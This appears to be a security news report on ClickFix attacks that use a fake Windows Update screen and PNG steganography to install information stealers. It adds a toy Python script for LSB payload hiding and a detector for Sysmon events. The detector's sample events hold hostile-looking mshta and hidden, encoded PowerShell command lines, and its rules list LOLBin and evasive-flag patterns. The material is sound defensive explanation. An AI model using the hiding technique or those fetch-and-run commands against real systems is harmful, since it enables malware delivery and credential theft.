Researchers have discovered a new wave of ClickFix attacks in which cybercriminals use a convincing fake Windows Update screen to get victims to install malware on their own systems.
According to BleepingComputer, the attacks have been observed since early October. They appear to be particularly effective because victims believe they are dealing with a legitimate update to their operating system: the web page takes over the entire screen and shows animations that closely mimic a real Windows Update. While users think they are carrying out the steps needed to finish the update, they are in fact executing commands prepared by the attackers.
Malicious instructions on the clipboard
The techniques used in these campaigns are a clear evolution of earlier ClickFix methods. Where previously the commands were simply displayed for users to copy themselves, a script on the web page now places the malicious instructions on the clipboard automatically.
The visitor is then told to press a key combination to "complete" the update. Doing so pastes and runs the copied commands, which are executed immediately by the Windows command prompt.
A distinctive feature of the latest variants is the use of steganography to hide the actual malware in images. Rather than appending the malicious code to an existing file, the attackers place fragments of the payload in the pixel data of PNG images.
According to the researchers, specific colour channels are manipulated so that the final payload can only be reconstructed in memory once a loader written for that purpose runs; the image file itself never holds the payload in a directly usable form.
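The channel manipulation described above, as an added illustration (this is not the Stego Loader's code, which the report does not reproduce). It assumes a toy scheme: payload bits are written into the least significant bit of the blue channel, preceded by a 4-byte length, and the PNG encoder/decoder is a minimal unfiltered RGB one written here for the example. The cover image is constructed in code. The point it shows is that the PNG stays a valid image and the payload only exists once the pixel data is read back and reassembled in memory.

```python
"""Toy LSB steganography in the blue channel of an RGB PNG (added example)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, body: bytes) -> bytes:
    """One PNG chunk: big-endian length, tag, body, CRC32 over tag+body."""
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def write_png(width: int, height: int, pixels: bytearray) -> bytes:
    """Encode raw 8-bit RGB pixels (row-major, 3 bytes/pixel) as an unfiltered PNG."""
    stride = width * 3
    raw = b"".join(b"\x00" + bytes(pixels[y * stride:(y + 1) * stride]) for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit, colour type 2 = RGB
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Decode a PNG produced by write_png; returns (width, height, pixels)."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos < len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        tag, body = data[pos + 4:pos + 8], data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if depth != 8 or ctype != 2:
                raise ValueError("toy decoder handles 8-bit RGB only")
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length
    raw, stride, pixels = zlib.decompress(idat), width * 3, bytearray()
    for y in range(height):
        row = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if row[0] != 0:
            raise ValueError("toy decoder handles filter type 0 only")
        pixels += row[1:]
    return width, height, pixels


def embed(pixels: bytearray, payload: bytes) -> bytearray:
    """Write [len][payload] bit by bit into the LSB of each pixel's blue channel."""
    out = bytearray(pixels)
    data = struct.pack(">I", len(payload)) + payload
    if len(data) * 8 > len(out) // 3:  # one bit per pixel
        raise ValueError("payload too large for cover image")
    for i in range(len(data) * 8):
        bit = (data[i // 8] >> (7 - i % 8)) & 1
        idx = i * 3 + 2  # blue channel of pixel i; red and green are untouched
        out[idx] = (out[idx] & 0xFE) | bit
    return out


def extract(pixels: bytes) -> bytes:
    """Reassemble the payload from the blue-channel LSBs (what a loader does in memory)."""
    def read_bytes(start_bit: int, count: int) -> bytes:
        buf = bytearray()
        for b in range(count):
            val = 0
            for k in range(8):
                val = (val << 1) | (pixels[(start_bit + b * 8 + k) * 3 + 2] & 1)
            buf.append(val)
        return bytes(buf)
    length = struct.unpack(">I", read_bytes(0, 4))[0]
    return read_bytes(32, length)


def roundtrip(payload: bytes, width: int = 64, height: int = 64) -> bytes:
    """Constructed gradient cover image -> embed -> PNG bytes -> decode -> extract."""
    pixels = bytearray()
    for y in range(height):
        for x in range(width):
            pixels += bytes(((x * 4) & 0xFF, (y * 4) & 0xFF, (x + y) & 0xFF))
    png = write_png(width, height, embed(pixels, payload))
    _, _, recovered = read_png(png)
    return extract(recovered)


if __name__ == "__main__":
    print(roundtrip(b"constructed payload, not real shellcode"))
```

A real loader adds a decryption step on top of this and reads the image from an embedded resource rather than disk, but the detection consequence is the same: the PNG parses cleanly, so image-level signatures are of little use and the behaviour to watch for is the loader turning image bytes into executable memory.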
Central role for PowerShell scripts
The attack usually begins by launching mshta, a legitimate Windows component that runs HTML Applications and the JScript they embed. From there the criminals set off a chain of follow-up actions in which PowerShell scripts and a .NET assembly play the central role. That assembly, internally named Stego Loader, carries encrypted resources which in turn hold the hidden PNG; custom C# code decrypts the content and converts it into usable shellcode.
While investigating how this loader works, the researchers noticed that the threat actor calls thousands of empty functions before the real code runs. This padding complicates analysis and detection by making it harder for security software, and for analysts, to see the malware's actual behaviour. Once this layer is stripped away, the final payload turns out to consist of variants of information stealers that collect sensitive data such as login credentials and browsing information.
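Host-side detection of the sequence described in the clipboard section (a command pasted into the Run dialog and executed) and in the paragraph above (mshta handing off to PowerShell), as an added example rather than anything from the researchers' report. It assumes Sysmon-style process-creation records flattened to key=value lines and that a command launched from the Run dialog has explorer.exe as its parent; the four sample records are constructed, and the hostname and encoded command in them are placeholders.

```python
"""Added example: flag ClickFix-style process chains in Sysmon-like telemetry."""
import re

# Constructed records mimicking Sysmon Event ID 1 (process creation), flattened
# to key=value pairs. The hostname and the encoded command are placeholders.
SAMPLE_EVENTS = [
    'Image=C:\\Windows\\System32\\mshta.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="mshta https://example.invalid/update.hta"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\System32\\mshta.exe '
    'CommandLine="powershell -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"',
    'Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe '
    'CommandLine="notepad.exe C:\\Users\\alice\\notes.txt"',
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentImage=C:\\Windows\\explorer.exe CommandLine="powershell"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
URL_RE = re.compile(r"https?://", re.I)
# Flags typical of pasted ClickFix one-liners: encoded command, hidden window, no profile.
EVASIVE_ARGS = re.compile(
    r"(?:^|\s)-(?:encodedcommand|enc|ec|e|noprofile|nop|windowstyle\s+hidden|w\s+hidden)\b", re.I
)
# Binaries a Run-dialog one-liner typically starts with.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def parse_event(line: str) -> dict:
    """Split a flattened record into a dict, dropping the quotes around CommandLine."""
    return {key: val.strip('"') for key, val in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the reasons an event looks like a ClickFix launch or stager hop (empty if benign)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    # Stage 1: the pasted command. Parent is the shell (explorer.exe) because the
    # Run dialog launched it, the child is a LOLBin, and it either fetches a URL or
    # carries evasive flags. A plain interactive "powershell" does not match.
    if parent == "explorer.exe" and image in LOLBINS and (URL_RE.search(cmd) or EVASIVE_ARGS.search(cmd)):
        reasons.append("user-launched LOLBin with remote URL or evasive flags (Run-dialog ClickFix pattern)")
    # Stage 2: the HTA stager spawning a script host for the PowerShell/.NET chain.
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        reasons.append("mshta.exe spawning a script host (stager chain)")
    return reasons


def scan(lines) -> list:
    """Return (image basename, reasons) for every record that trips a rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reasons = classify(event)
        if reasons:
            hits.append((basename(event.get("Image", "")), reasons))
    return hits


if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

The rules deliberately require a second signal besides the parent/child pair, otherwise every administrator opening PowerShell from the Start menu would alert. For after-the-fact triage, the Run dialog also keeps its history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a pasted mshta or PowerShell one-liner usually survives there even when the browser history does not.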
Although parts of the infrastructure used in these attacks have since been disrupted, the deceptive web pages remain online and the technique behind ClickFix continues to pose a real threat.